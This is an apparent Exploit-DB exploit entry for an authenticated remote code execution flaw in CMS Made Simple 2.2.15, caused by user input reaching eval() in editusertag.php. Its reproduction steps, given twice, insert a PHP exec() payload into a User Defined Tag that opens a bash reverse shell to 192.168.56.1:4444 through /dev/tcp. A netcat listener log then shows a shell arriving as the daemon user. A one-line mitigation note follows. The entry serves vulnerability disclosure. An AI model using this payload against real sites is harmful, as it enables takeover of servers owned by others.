CMS Made Simple 2.2.15 - RCE (Authenticated)

vendor:

CMS Made Simple

by:

Andrey Stoykov

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: CMS Made Simple

Affected Version From: 2.2.15

Affected Version To: 2.2.15

Patch Exists: YES

Related CWE: N/A

CPE: 2.2.15

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Debian 10 LAMPP

2020

CMS Made Simple 2.2.15 – RCE (Authenticated)

Vulnerability is present at 'editusertag.php' at line #93 where the user input is in eval() PHP function. Reproduction Steps: 1. Login as administrator user and navigate to Extensions->User Defined Tags 2. Add code with the payload of: exec('/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1''); 3. Click on the newly created User Defined Tag and use the Run function RCE will be achieved.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in eval() function.

Source

Exploit-DB raw data:

# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
# Author: Andrey Stoykov
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
# Version: 2.2.15
# Tested on: Debian 10 LAMPP
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/12/cms-made-simple-2215-authenticated-rce.html

Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function.

// Vulnerable eval() code

if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {

Reproduction Steps:

1. Login as administrator user and navigate to Extensions->User Defined Tags

2. Add code with the payload of:
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'");

3. Click on the newly created User Defined Tag and use the Run function

RCE will be achieved:

astoykov@Lubuntu:~$ nc -kvlp 4444
nc: getnameinfo: Temporary failure in name resolution
Connection received on 192.168.56.132 53690
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)